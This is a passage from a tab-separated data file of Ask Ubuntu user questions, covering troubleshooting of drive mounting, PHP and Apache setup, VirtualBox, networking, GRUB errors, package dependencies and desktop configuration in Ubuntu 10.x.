as the mount location for /dev/sda2 and it was not booting ubuntu . then i fixed the problems by changing the fstab file contents by booting from a livecd and mounting the drive on /mnt/* . problems now when i look at the contents under /media , they are : jatin @ jatin-ubuntu : ~ $ cd /media/ jatin @ jatin-ubuntu : /media $ ls fun jatin masti sda2 sda3 sda5 sda7 sdc1 silver silver spoon study windows7 with issues in all the directories in bold . when i open silver or silver spoon , nothing shows up . some of my ntfs drives get auto-mounted in read-only mode , while others get auto-mounted in correct ( read-write ) mode . when i try to open my external hard drive , it says only root can mount it and a user ca n't . i know this can be fixed by simply removing the line for /dev/sdc1 from the fstab file . questions are both these fstab and fstab.bak files important ? should n't just one be there ? how can i get my system in it 's previous state , before i installed pysdm ? when should i uninstall pysdm , before editing the fstab file or after ?
31635	can i setup an svn server on ubuntu one ?	i have an svn server which i use for my personal web development projects . can i move this to ubuntu one ? will it be accessible over the intenet ? would i be able to perform the normal svn operations like commit and update ?
31637	install php 5 on a fresh installation	i have a fresh installation of ubuntu 10.10 and i 'd like to get php to work . i 've tried sudo apt-get install apache2 sudo apt-get install php5 sudo apt-get install libapache2-mod-php5 sudo /etc/init.d/apache2 restart but when i navigate to http : //localhost/ all i see is the the firefox error page stating `` unable to connect '' . moreover , when i try http : //localhost/test.php , instead of the php file being executed , the browser asks if i 'd like to download the file . here is the error.log file contents : [ thu may 19 12:04:49 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) configured -- resuming normal operations [ thu may 19 12:05:01 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ thu may 19 12:05:04 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ thu may 19 12:12:42 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/asd [ thu may 19 12:13:32 2011 ] [ notice ] graceful restart requested , doing restart [ thu may 19 12:13:32 2011 ] [ notice ] apache/2.2.16 ( ubuntu ) configured -- resuming normal operations [ thu may 19 12:14:11 2011 ] [ notice ] sighup received . attempting to restart php deprecated : comments starting with ' # ' are deprecated in /etc/php5/apache2/conf.d/interbase.ini on line 1 in unknown on line 0 php deprecated : comments starting with ' # ' are deprecated in /etc/php5/apache2/conf.d/lasso.ini on line 1 in unknown on line 0 php deprecated : comments starting with ' # ' are deprecated in /etc/php5/apache2/conf.d/ming.ini on line 1 in unknown on line 0 php warning : function registration failed - duplicate name - idn_to_ascii in unknown on line 0 php warning : function registration failed - duplicate name - idn_to_utf8 in unknown on line 0 php warning : intl : unable to register functions , unable to load in unknown on line 0 [ thu may 19 12:14:11 2011 ] [ notice ] seg fault or similar nasty error detected in the parent process
31639	how can i backup vps server while it is running ?	i am using debian and ubuntu on my vpses . how can i backup my vpses while they are running ? and how can i restore on any emergency ?
31646	default gateway changing	i am using 3 ethernet interfaces on ubuntu but when i restart , the default gateway is changing to a different interface . each time i boot i have to change default gateway back to the eth1 by deleting the default gateway and adding it back with eth1 . how can i fix this problem ?
31648	connect via apple file protocol ?	how can i connect to a mac per afp ( apple file protocol ) from ubuntu as client ? are there any solutions ?
31655	some mp3s have to be synced multiple times before tags are read properly	i 've been having trouble with tags not being read on the first try . say i rip a cd to mp3 , tag it properly ( typically both id3v2.4 and id3v1.1 tags ) with picard and/or puddletag , then move it to my music directory so it is synced with u1 . the files will all sync , but 1 or 2 tracks off each album will show up as `` unknown artist '' in the android application . it does n't matter if i wait minutes or days , the tags never get scanned or fixed . the only thing that works is moving the affected files to another folder temporarily then moving them back so they are uploaded again . now this is n't a showstopper , but it 's an annoyance that i have to re-sync probably 10-20 % of my music because the tags are n't scanned properly on the first try . this has happened consistently since i first signed up for the service last year . is this a known issue or do i seem to be the only one affected ? thanks
31659	how to install my video card to the virtualbox ( ubuntu host , windows guest ) ?	i 'm using the sun virtualbox with guest additions , and i 'm not able to run some applications that need a 3d video card support . the video card installed in the virtual box is `` virtualbox graphics adapter '' . i 'm using windows xp guest and ubuntu host . my video card support 3d apps very well , is there a way to make it work in the virtualbox ?
31660	wired networking problem on an acer am350 netbook	am a linux newbie and i recently insatalled ubuntu maverick meekart on my netbook . i usually use wifi or a wired network for internet . however after using it for a couple of days without a hitch i can not connect to the internet anymore because whenever a hook the cable to the rj45 connector or i turn on wifi to use the wireless hotspots in school the system starts searching but to my utter diassapointment when it finishes instead of connecting i am notified that the connection has been disconnected and i am now offline . this is the fact that wifi is on and/or the rj45 connector is correctly hooked . please help . because am really starting to like my new os and wouldnt want to dump it and re-install windows
31664	photo manager that organises by folder structure	i have my pictures very well organized on the harddisk , in this structure : pictures canon holiday 2010 sony graduation 2000 other albums steves holiday 2010 album thus , i have a main folder that holds all my pictures , and within a lot of folders with subfolders of at least 2 levels ( device & album name ) . i used picasa to organize my pictures on windows , now on ubuntu i would like to use a more native application than running picasa on wine . there is a lot of applications out there , but none of these seems to be able to import all my pictures and organize it in the hierarchy i arranged them in with folders and subfolder like picasa does it . is there an application , preferably for the gnome desktop that can do this ?
31667	what does `` no apport report written because maxreports is reached already '' mean ?	when installing a linux kernel image package , i got , amongst other errors : no apport report written because maxreports is reached already where can i delete old reports so that apport can resume doing its bug reporting magic again ?
31670	is it possible to have a separate remote desktop vnc for each workspace ?	for example suppose my ip address is 192.168.1.1 would i be able to have 192.168.1.1:5901 connecting to workspace 1 192.168.1.1:5902 connecting to workspace 2 etc ?
31672	what is the real usage of my home folder ?	when i look throw gparted , it shows my home folder using 30.27 gb : the disk usage analyzer shows 13.3 gb : and the properties show 26.0 gb : so , what 's the real usage of my home folder ?
31675	decrypt $ home from separate partition after re-install	previously , i had installed 10.10 with three partitions - sda1-/boot ( ext2 ) sda2-/ ( btrfs ) sda3- /home ( btrfs ) . and i have chosen encrypted home folder . now on same machine i have installed 10.04 ( lts ) with choosing new /boot on same sda1 , / on same sda2 ( ext4 ) and sda3 ( home ) left untouched from earlier install . my problem is that now i cant access/mount my previous home with ecryptfs-mount-private util with the passphrase of earlier home user . here is the error : encrypted private directory is not setup properly . i have also installed btrfs utilities . so are there any solutions/workarounds to gain access to $ home on different partition .
31678	how to mount a ntfs disk in the text mode ( from command line ) ?	in the gui , mode to mount a disk , i just click the name of the drive in the menu `` place '' , and the disk gets mounted . however , can i mount that drive easily in the text mode ( from terminal or command line ) just using a command ?
31680	launches the audio player whenever trying to open any directory	am a new linux user and recently installed ubuntu 10.10 on my netbook.however it has this strange bug where whenever i click to open any directory instead it launches the default audio player-audacious.anyone experiencing the same and any suggestions on how i can fix ?
31686	time-based skydome change for compiz cube + kde ?	i 'm trying to find a way to automatically switch skydome 'wallpapers ' for compiz cube based on time , say ten minutes . having each of my desktops use a different one would be bonus internets . any help would be awesomely appreciated . edit : in case anyone 's interested , here 's a small script you can run from cron . # ! /bin/bash pic=/your/background/directory newbg= '' $ ( ls $ pic | shuf -n1 ) '' dbus-send -- type=method_call -- dest=org.freedesktop.compiz /org/freedesktop/compiz/cube/screen0/skydome_image org.freedesktop.compiz.set string : '' $ pic $ newbg '' see http : //wiki.compiz.org/plugins/dbus
31688	how can i access my files on the computer from a livecd ?	after i boot from my ubuntu 10.10 cd , how can i access my files in sda3 ? there 's no /dev/sda3 folder here.. ( the partition is ext4 )
31691	unable to add the stackapplet to panel	i 'm running ubuntu 10.10 , and am trying to add the stackapplet to the panel . the steps i 'm following are , just to be sure i 'm not doing something obviously wrong : right-click on the top panel click 'add to panel' select 'stackapplet ' from the menu dialogue that appears . doing this causes a small , roughly 1px2 , grey square to be added to the panel , but with no indication of why the stackapplet is n't responding/loading . i 've tried adding to the panel , then restarting gdm and also adding to the panel and then restarting the system . neither approach seemed to achieve anything . i 've also completely removed/purged , and then reinstalled , stackapplet via synaptic in the hope that might fix any dependency issues , to no avail.. obviously there is further information needed to answer this question , but at this stage i do n't know enough about what information might be needed , or , in most cases , how to find it . i 'll do my best to add any information requested in comments , though , to try and solve this . my thanks in advance , for any and all help and guidance anyone can offer ... questions i 've read through prior to asking : stack applet was not starting automatically do n't seem to have the file : ~/.xsession-errors did n't have , but did create , the file ~/.config/autostart/stackapplet.desktop with the contents suggested in the accepted answer . ca n't add to panel nor delete panel have n't tried reinstalling gnome-panel , yet , mainly because i 've read elsewhere that this may cause a world of pain . if that 's wrong , i 'll happily give it a go , though . how can i add the network manager applet to the panel after removing ? tried re-adding the notification area to the panel , which worked ( in that it added the notifcation area ) , but did n't resolve the stackapplet problem . edited in response to @ evilphoenix 's answer : stackapplet is run via a different system . run stackapplet from applications > accessories . it will then turn itself on then put itself automatically into the system tray i do n't appear to have stackapplet available in the accessories menu : though i do have stackapplet installed ( according , at least , to the ubuntu software centre ) :
31694	freezes after a period of time on an intel i945	recently installed ubuntu 10.10 on my intel pc . after i log in and desktop appears it freezes after sometime . mouse does not work and neither the keyboard . i have this same problem with ubuntu 10.04 . but i used 9.04 for over an year . there was no such problem with 9.04 . currently i have a dual-boot system setup with windows 7 and ubuntu 10.10 ( which is not working ) . the specifications of my system are : intel 945g series chipset motherboard . core2duo 2 gb ddr2 ram
31707	why ca n't i access my server via ssh or http on my host machine , but i can on a virtual machine ?	i have an ubuntu 10.10 machine hosting a virtual windows machine on virtualbox . i have 3 servers i connect to using ssh with password authentication , on standard port ( 22 ) for some unknown reason , i have one server that i can not connect to via ssh using putty/terminal or http via browser from my host nix box , but my virtual machine can connect via both . same machine , same network , one virtual with a bridged adapter , one physical network card connected to my network . really not sure where to start in troubleshooting . any suggestions ?
31710	where is sun 's jdk located on the filesystem ?	i installed sun 's jdk and i ca n't locate it . in : /usr/lib/jvm/java-6-sun/ is only jre , where is jdk ?
31711	hibernating my ubuntu 10.10 takes a bit too long	it takes about 5 minutes most of the time to hibernate my ubuntu 10.10 . this is unacceptable ! is there a work-around i could use to improve the situation ? thank you .
31712	how do i install the ask ubuntu unity lens , and how do i use it ?	i heard about the ask ubuntu unity lens over in the chat , and i was wondering how to install it . what are the step-by-step instructions to get it installed , activated and once that 's done , how do i use it ?
31717	error : cat : /boot/grub/video.lst : no such file or directory	i recently shifted from windows ( windows7 ) to ubuntu ( 10.10 ) 64 bit . after installation i performed the usual updates and i received a new kernel version ( 2.6.35-28-generic ) . after that i read the post on the address mentioned below : http : //osdir.com/ml/ubuntu-users/2011-03/msg00932.html to remove the additional kernel versions from the grub ( & my system as i do n't want to keep them ) . now when update the grub using the below mentioned shell command : sudo update-grub i get the following result : cat : /boot/grub/video.lst : no such file or directory found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found freedos on /dev/sda1 found windows vista ( loader ) on /dev/sda4 done now i do n't know what is the meaning of : cat : /boot/grub/video.lst : no such file or directory if it is an error , how can i fix it . can anyone please guide me to fix it ? . regards , fahad
31724	broken package error while installing development headers for libcurl	some of the software i want to use has a dependency on development headers of curl library . i did apt-cache search libcurl and see that libcurl4-gnutls-dev and libcurl4-openssl-dev packages provide the necessary development headers . however , when i run sudo apt-get install libcurl4-gnutls-dev i get the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcurl4-gnutls-dev : depends : libkrb5-dev but it is not going to be installed or hurd but it is not installable e : broken packages googling for this did not prove helpful . i am running ubuntu 10.10. uname -a on my system gives the following output : linux skynet 2.6.35-22-generic # 33-ubuntu smp sun sep 19 20:32:27 utc 2010 x86_64 gnu/linux any clue on how to fix the broken package error ? output of sudo apt-get update get:1 http : //extras.ubuntu.com maverick release.gpg [ 72b ] ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en get:2 http : //linux.dropbox.com maverick release.gpg [ 489b ] ign http : //linux.dropbox.com/ubuntu/ maverick/main translation-en ign http : //linux.dropbox.com/ubuntu/ maverick/main translation-en_in ign http : //extras.ubuntu.com/ubuntu/ maverick/main translation-en_in get:3 http : //extras.ubuntu.com maverick release [ 9,762b ] get:4 http : //linux.dropbox.com maverick release [ 2,605b ] get:5 http : //extras.ubuntu.com maverick/main sources [ 668b ] get:6 http : //linux.dropbox.com maverick/main amd64 packages [ 772b ] hit http : //in.archive.ubuntu.com maverick release.gpg get:7 http : //extras.ubuntu.com maverick/main amd64 packages [ 700b ] ign http : //in.archive.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/main translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/multiverse translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_in ign http : //in.archive.ubuntu.com/ubuntu/ maverick/universe translation-en ign http : //in.archive.ubuntu.com/ubuntu/ maverick/universe translation-en_in hit http : //in.archive.ubuntu.com maverick release hit http : //in.archive.ubuntu.com maverick/main sources hit http : //in.archive.ubuntu.com maverick/restricted sources hit http : //in.archive.ubuntu.com maverick/universe sources hit http : //in.archive.ubuntu.com maverick/multiverse sources hit http : //in.archive.ubuntu.com maverick/main amd64 packages hit http : //in.archive.ubuntu.com maverick/restricted amd64 packages hit http : //in.archive.ubuntu.com maverick/universe amd64 packages hit http : //in.archive.ubuntu.com maverick/multiverse amd64 packages fetched 15.1kb in 1min 16s ( 197b/s ) reading package lists ... done output of sudo aptitude install libcurl4-gnutls-dev the following new packages will be installed : comerr-dev { a } krb5-multidev { ab } libcurl4-gnutls-dev libgcrypt11-dev { a } libgnutls-dev { a } libgpg-error-dev { a } libgssrpc4 { a } libidn11-dev { a } libkadm5clnt-mit7 { a } libkadm5srv-mit7 { a } libkdb5-4 { a } libkrb5-dev { a } libldap2-dev { a } libtasn1-3-dev { a } 0 packages upgraded , 14 newly installed , 0 to remove and 0 not upgraded . need to get 4,436kb of archives . after unpacking 13.2mb will be used . the following packages have unmet dependencies : krb5-multidev : depends : libkrb5-3 ( = 1.8.1+dfsg-5 ) but 1.8.1+dfsg-5ubuntu0.1 is installed . depends : libk5crypto3 ( = 1.8.1+dfsg-5 ) but 1.8.1+dfsg-5ubuntu0.1 is installed . depends : libgssapi-krb5-2 ( = 1.8.1+dfsg-5 ) but 1.8.1+dfsg-5ubuntu0.1 is installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) krb5-multidev [ not installed ] 2 ) libcurl4-gnutls-dev [ not installed ] 3 ) libkrb5-dev [ not installed ] accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0b of archives . after unpacking 0b will be used .
31731	install ubuntu on thinkpad , recovery section must remain intact	i want to install ubuntu on a lenovo thinkpad t500 that i 've got . however , due to some licensing and warranty issues , the recovery section on the disk ( the one that enables the `` thinkvantage '' button ) must remain intact . i install ubuntu on a dual-boot with a windows xp partition , and when in windows , the thinkvantage button must work . did anyone experienced problems with this , have any advice , or know of precautions that must be taken to ensure this ?
31783	why do i get `` permission denied '' errors with python easy_install ?	i 'm an ubuntu newbie and have been trying to install python 's easy_install so that i do n't have to deal with source files when install python libraries . i '' ve ran the following , and it seems to install the correct applications : sudo apt-get install python-setuptools however , when i run easy_install sqlalchemy or easy_install pysqlite3 , it does n't work . i get the following error message : install_dir /usr/local/lib/python2.6/dist-packages/ error : ca n't create or remove files in install directory the following error occurred while trying to add or remove files in the installation directory : [ errno 13 ] permission denied : '/usr/local/lib/python2.6/dist-packages/test-easy-install-1674.pth' the installation directory you specified ( via -- install-dir , -- prefix , or the distutils default setting ) was : /usr/local/lib/python2.6/dist-packages/ perhaps your account does not have write access to this directory ? if the installation directory is a system-owned directory , you may need to sign in as the administrator or `` root '' account . if you do not have administrative access to this machine , you may wish to choose a different installation directory , preferably one that is listed in your pythonpath environment variable . for information on other options , you may wish to consult the documentation at : http : //packages.python.org/distribute/easy_install.html please make the appropriate changes for your system and try again . help ! abraham
31786	chrome asks for password to unlock keyring on startup	in google chrome , when i go to a login page , a window pops up asking to `` enter password for keyring 'default ' to unlock '' . in most cases , whether i click cancel or enter my password , the login form gets auto filled anyway . how do i get rid of the popup ? i want it to auto login each time , not ask for my system password . the dialog box never appears for any other apps .
31789	define static routes at boot	i 'm running ubuntu desktop 10.04 and on every boot the machine can not be accessed from outside the lan . after running sudo route add default gw 192.168.1.1 everything works as expected . is there any way to make this happen on boot ? i 've tried adding a cron job but that did n't work . any ideas ?
31791	is there a driver for a nvidia geforce gt525m ?	i 'm planning to buy a new laptop : http : //www.dell.com/us/p/xps-l502x/pd ? oc=dndodq1 & model_id=xps-l502x in this laptop there is a 1024mb nvidia速 geforce速 gt525m video card . but when i looked on the nvidia site to download drivers they do n't have any linux drivers for this card ... http : //www.nvidia.com/download/find.aspx ? lang=en-us will i be able to use this video card in ubuntu ?
31792	problem with public-key authentication	i 've created new ssh keys on my dev box a while ago . i did : ssh-keygen -t rsa -c `` myemail @ mail.com '' i copy the key to my shared host . now i need to connect using the credentials on the key right ? what should i write on the command line , in order to connect by using those credentials now ? please advice , i 'm a little lost here . k. regards , mem
31794	where on my disk did ubuntu install to ?	i installed ubuntu on my windows machine and during the installation time , i followed the first instruction which is side by side install ubuntu or something . now i can boot windows and ubuntu both pretty nicely . but i am wondering where the ubuntu installed ? since i check the disk usage through the file manager on windows , nothing seems to changed ... thank you
31798	in virtualbox fullscreen mode , can i disable or move the popup menu bar ?	i 'm running xp in virtualbox cause i need photoshop and illustrator . it works great on my 5 year old laptop which is stunning , but there 's a minor annoyance when i go fullscreen . the menu bar is in the bottom middle , and it pops up over the content . since i use the escape buttons all the time i have no need for this to be there really , and it 's really annoying when you try to change windows with the mouse and hit some random virtualbox menu item instead ... i know it 's minor , and i can deal with the fact that you are probably just going to tell me to use alt+tab , but i 'm just hoping there 's some option i have overlooked that can turn off this bar or move it ... thanks .
31799	opening a terminal on startup	is there any way for me to force a brand new terminal to open upon starting up ubuntu ? i 'd like to just get going in a new terminal every time i restart without having to click and open it . i 've poked around in the startup applications preferences to try and get it to become a designated startup program , but i was n't sure where the terminal is as an actual installed program on my hard drive ( if it even is ) . any help would be appreciated !
31803	permission problems with clamfs	been trying to get clamfs working on ubuntu 10.4 . it seems like everything is working , clamfs locates infected files and prevents me from opening these . but i am having permission troubles with a share that i have created . my folder structure looks like this : /.sharedfiles ( this is the root directory for clamfs ) /sharedfiles ( this is the actual shared folder on the server that my windows clients connect to ) . when clamfs is not running , i can create and delete folders etc within ../sharedfiles from a windows client . but when i turn clamfs on i can only create files and folder immediately within ../sharedfiles . ie i can create ../sharedfiles/newdirectory but i can not create ../sharedfiles/newdirectory/somefile i have played around with the permissions and acls but something is just not working . i should mention that the windows clients are logging into the shared directory without a user . ie they are '' nobody '' and in the `` nogroup '' group . i have set the acl for both .sharedfiles and sharedfiles as below : getfacl .sharedfiles/ # file : .sharedfiles/ # owner : administrator # group : administrator user : :rwx group : :rwx other : :rwx default : user : :rwx default : user : clamav : rwx default : group : :rwx default : mask : :rwx default : other : :rwx getfacl sharedfiles/ # file : sharedfiles/ # owner : administrator # group : administrator user : :rwx group : :rwx other : :rwx default : user : :rwx default : user : clamav : rwx default : group : :rwx default : mask : :rwx default : other : :rwx this is how i have configured my clamfs .xml file : < filesystem root= '' /home/administrator/.sharedfiles '' mountpoint= '' /home/administrator/sharedfiles '' public= '' yes '' readonly= '' no '' nonempty= '' yes '' / > any idea on where i am going wrong ? i would really like to get this working . thanks .
31809	wireless not working on a dell xps 15	i have a dell xps 15 running windows 7 , i recently installed ubuntu 10.10 . the ubuntu os detects my bluetooth card but not my wireless internet card . initially i could browse the internet through a wired internet connection but after a recent update even that has stopped working . during boot up i logged on to a previous generic release and thats how i 'm able to access wired internet connections now but wireless is still out . any idea how i can get back wireless and wired connections to work on the latest release ? i tried installing a synaptic package for the wireless cards through synaptic manager , some linux kernel files were installed . ever since then i have not been able to connect to the internet . it was on release-28 . i currently log into the release-27 in the grub bootloader to use the net . iâ´m pretty new to linux so the details that i provide as such maybe incomplete .
31810	nvidia problem with vostro 3700 in maverick	i ca n't configure my nvidia geforce 330m with my dell vostro 3700 . i am using ubuntu 10.10 . it seems to be a conflict since it has two graphic cards : intel i915 and nvidia 330m . it seems to be a problem without solution since september 2010 , is there a solution or workaround ?
31812	what can i use to open a floating point tiff ?	on this thread i saw that gimp is not displaying this tiff image right . is there another program i can use to open it ?
31815	firefox does n't start	after installing firefox 4 , it does n't start .
31824	how can i add the volume/sound manager to my panel	somehow i do n't have the sound manager in my panel on ubuntu 10.10 . how can i add it ? it is not in the list of panels that i can add .
31826	wifi stops working after waking from suspend with a broadcom 43225	wired connection works but i am forced to reboot if i want wifi to start working again . i have an acer one 721-3801 on 10.10. help ? i have the broadcom 43225 driver if that helps ... ( i am very new to ubuntu so please let me know if you need any additional info )
31828	reading avchd/m2ts files	i have a sony camcorder which records avchd discs that contains m2ts . how can these files be read under ubuntu ? a fresh installation of 10.10 will open the files but the playback is very choppy . the same thing goes when trying to add with openshot . i found the following post which suggests to repackage with ffmpeg to an mkv file , which in my situation did not help : http : //ubuntuforums.org/showthread.php ? t=1627194
31836	how do i get firefox 4 on my lucid lynx ? i tried to install it using synaptic package manager but ca n't find the latest version i.e . 4	is the the packages still not out ?
31840	increase scrollbar contrast	i 've been following several bugs since lucid was released : scrollbars are really hard to see with the ambiance/radiance themes [ ambiance , radiance ] slider on scrollbar haves zero contrast the short of is , i have difficulty distinguishing the scrollbar grabby bit from the trough it lives in . several `` fixes '' have been committed with absolutely no change to the contrast in this area ( despite bold claims by their authors : @ ) . how can i increase the contrast of brightness or color between the scrollbar trough and bar , without adding theme specific hacks , or constrain those changes to only the themes i have difficulty with ?
31842	how to read time zone information	i was looking at some book of system programming.it mentioned to use a variable tz with a colon : separate list which is used from /usr/share/zoneinfo probably the book is a bit outdated.i checked on my ubuntu system /usr/share/zoneinfo/asia $ file oral gives following output oral : timezone data , version 2 , 14 gmt time flags , 14 std time flags , no leap seconds , 51 transition times , 14 abbreviation chars i tried opening it in vi but the text could not be read . i also tried reading /etc/localtime but here also it could not be read . 1 ) how can i basically read above type of files 2 ) where is tz environment variable defined in ubuntu 10.04
31846	completely uninstall/reinstall eclipse and add support for php and jquery	i have been using eclipse a short while and it worked perfectly until i started downloading different plugins that i did n't really need . now i get a ton of different errors and ca n't even open a php file . what i want to do is just to remove eclipse and reinstall it , but that was much harder that i first thought . i marked every eclipse package in synaptic packaged manager and selected complete removal , i even deleted the .meta folder in my working dictionary , but when i installed eclipse again . it was as if i had n't removed anything . same errors from the plug-ins i had installed before . seems like when you install something in linux , files are stored all over the place . makes real hard do remove anything . so how do i completely remove eclipse , reinstall it and add support for php and jquery . thanks .
31849	how do i restart unity	i know about unity -- reset command . but how can i simply restart unity without resetting its profile ?
31854	slow compiz after gdm service restart	sometimes i get random desktop freezes , i can move the mouse and switch between ttys but the desktop is unresponsive ( looking for a way to diagnose this btw ) , so i do alt+ctrl+f2 and sudo service gdm restart this gives me my desktop back but i get a slow compiz . metacity -- replace works fine but you know how it is : ) information : ubuntu : 10.10 with latest updates . kernel : 2.6.38 graphics : latest gallium g300 from x-edgers .
31855	samba share not auto mounting at boot	well it was working fine , but i removed hidden config files from my $ home and now mounting halts at boot . i have to solve it manually or skip to get my gdm . what could be wrong , can anyone tell me ? thanks in advance . p.s . after i login , i have to run sudo mount -a to get the mounted samba share which used to auto mount before i removed the hidden configuration from my $ home directory . # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=50931261-ec36-47dc-b557-3f6d761e09b1 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda5 during installation # commented out by dropbox # uuid=5974aeb8-2f01-47d0-8e79-7295b72604ea /home ext4 defaults 0 2 # swap was on /dev/sda6 during installation uuid=16b54e62-6be8-4c3e-aab5-693c6e6778d9 none swap sw 0 0 //192.168.1.2/public /home/sagar/public cifs rw , guest , _netdev 0 0 uuid=5974aeb8-2f01-47d0-8e79-7295b72604ea /home ext4 defaults , user_xattr 0 2 basically the samba share is read/write access with public share
31856	note sync with simplenote ?	is there any note-taking app for linux that syncs with simplenote ? are there any plans to make tomboy do it ?
31860	intranet with ubuntu	i have one intranet 192.168.0.x/255.255.255.0 and i want to configure another intranet ( 192.168.1.x ) under the first intranet ( 192.168.0.x ) . ( x.x.x.x ) modem ( 192.168.0.x ) > computers and one switch to > ( 192.168.0.53 ) ubuntu ( 192.168.1.1 ) > computers . i have some questions : the udp used with ubuntu need to be both crossover ? the eth0 and eth1 configuration ( file interface ) ? do i need another configuration in anothe file ? i am newbie , please help ! ! !
31861	mouse , mx revolution search to paste highlighted text	looked into a few guides and all of them seem dated . all i really want is to be able to map the 'search button ' - > xf86search to middle mouse click . or at least replace the 'paste highlighted text ' to use this as a key as well . thanks
31862	how do i get a epson aculaser c1600 working ?	anyone managed to install this printer ? i 'd be grateful for any help !
31863	cross-platform non-ascii symbols in filenames with truecrypt	i have a truecrypt volume created under windows 7 . some folders and file names contain cyrillic symbols . when mounting the volume in ubuntu 10.10 , i see question marks instead of those letters . is there a solution , or should i avoid non-ascii symbols if i want to open the volume in windows and ubuntu ?
31864	error : no such device : guid	i have an old ( er ) machine that i 'm trying to wipe out and install ubuntu 10.04 . the machine has 4 500gb hdds that were previously set up as a raid . when i run the installer , it asks if i want to `` activate serial ata raid devices '' to which i usually answer 'yes ' . however , once the install is complete , i always get the following prompt : error : no such device : guid grub rescue > most of the posts i 've been able to find through google deal more with running multiple oses and less with raid ( which may or may not be the actual problem ) . any ideas on what i might be doing wrong ?
31866	oracle service is n't started on ubuntu load	i 've installed oracle 11g on ubuntu 10.10 i could access https : //localhost:1158/em web-interface ok. after reboot , i do n't think the oracle service was started , because i ca n't access this link more . is there a way to start it manually just in one command , without having to write an additional script ? thank you . [ edit ] lsnrctl start command gives : tns-01106 : listener using listener name listener has already been started so it 's looks ok if execute dbstart nothing happens sudo -u oracle dbstart gives : command not found command line : oracle @ edbwp400352 : /etc/init.d $ sudo sh oracledb start [ sudo ] password for oracle : starting oracle : lsnrctl for linux : version 11.2.0.1.0 - production on 24-mar-2011 20:28:34 copyright ( c ) 1991 , 2009 , oracle . all rights reserved . tns-01106 : listener using listener name listener has already been started ok command : oracle @ edbwp400352 : /etc/init.d $ emctl start oms gives : ulimit : 25 : bad number environment variable oracle_unqname not defined . please set oracle_unqname to database unique name .
31869	how to search pdf files by their metadata	i have a lot of pdf files with metadata like title , subject , author and so on . but neither nautilus nor synapse nor gnome-do can find any files by their metadata . is there any program or plugin to search by pdf-metadata ? i know about the nautilus columns plugin for displaying title and author , but it does n't allow you to search on them .
31875	how do i configure huawei usb modem	i plan to purchase a huawei e162e usb modem in ghana when 11.04 is released . my question does it work out of box like in windows or do i need to go the ubuntu way ! ( tweak ) . thanks in advance
31877	how do i use unity drag handles ?	i saw on this post that unity has touch enabled drag handles . how do i turn them on so i can use them with a mouse ?
31879	make apt-get install an older version	i 'm trying to downgrade mysql from 5.1 to 5.0 . after running apt-get remove mysql-server-5.1 i am attempting to run apt-get install mysql-server-5.0 . it says : note , selecting 'mysql-server-5.1 ' instead of 'mysql-server-5.0' how do i force it not to do that and to use 5.0 as desired ?
31888	how to verify that the iso i downloaded is bootable before i burn it ?	how can i check to make sure that the iso i downloaded is bootable , before i burn it ?
31890	what is the difference between `` connect to server ... '' and sshfs ?	can anyone quickly explain the technical difference between these two methods ? going to places - > connect to server and select ssh ( in gnome ) using sshfs in terminal this probably boils down to gvfs ( using fuse ) vs. fuse `` directly '' ( if this is a reasonable comparison ) . fuse i somewhat understand what is , but gvfs is a bit cryptic . both have advantages and disadvantages for me . the former allows easy access to the gui and you get the opportunity to create a bookmark , but sends you to the root folder of the remote file system ( unless you specify otherwise ) and mounts in ~/.gvfs/sftp on ... / which an be a bit cumbersome if you want to enter through local terminal . the latter must be done via the terminal ( as far as i know ) but you can choose which folder you want to `` jump into '' and one can choose for yourself where this will be mounted on your local filesystem . one thing that i find very annoying is that vim/gvim destroys permissions on files upon writing if i use gvfs . e.g . if a file permissions has 644 , this is set to 600 after vim/gvim has edited it . i 've seen various bug reports from 2008 on this but i still experience it .
31894	unable to connect to ubuntu one	i am having trouble connecting to ubuntu one . i have gone to system > preferences > ubuntu one and entered my account information . all seems well at this point . then when i go to the devices tab and click connect , it grays out for about 3 seconds and does nothing . i have tried reinstalling , rebooting , removing the machine from my account without any success . any ideas on other things to try ? fyi : i 'm using ubuntu 10.10 .
31895	internal speaker not working	my internal speaker was working before i updated ( including new kernel ) a few days ago . now it seems that my internal speaker is muted and only external speakers are working . i am using ubuntu 10.10 with my dv6000 laptop . i tried to fix the problem with alsamixer and it looks like i do n't have my speaker muted . when i check from problems in preferences - > sound i am getting :
31902	after upgrade , get blank purple screen . no gdm and ca n't switch to tty	i upgraded to 11.04 using update-manager -d. when i try to boot , i just get a purple blank screen , with no ubuntu logo/dots showing . it never gets to the gdm login screen ( i left it for 20min ) and i ca n't get to a tty by pressing ctrl+alt+f1 . i do n't see a grub menu/count down screen either . my computer is a dell vostro 1500 with a nvidia geforce . i had the proprietary nvidia driver installed before upgrading . i 've boot with a live cd , from where i am writing this , and i can mount the disk , but i do n't know where to start looking for the issue .
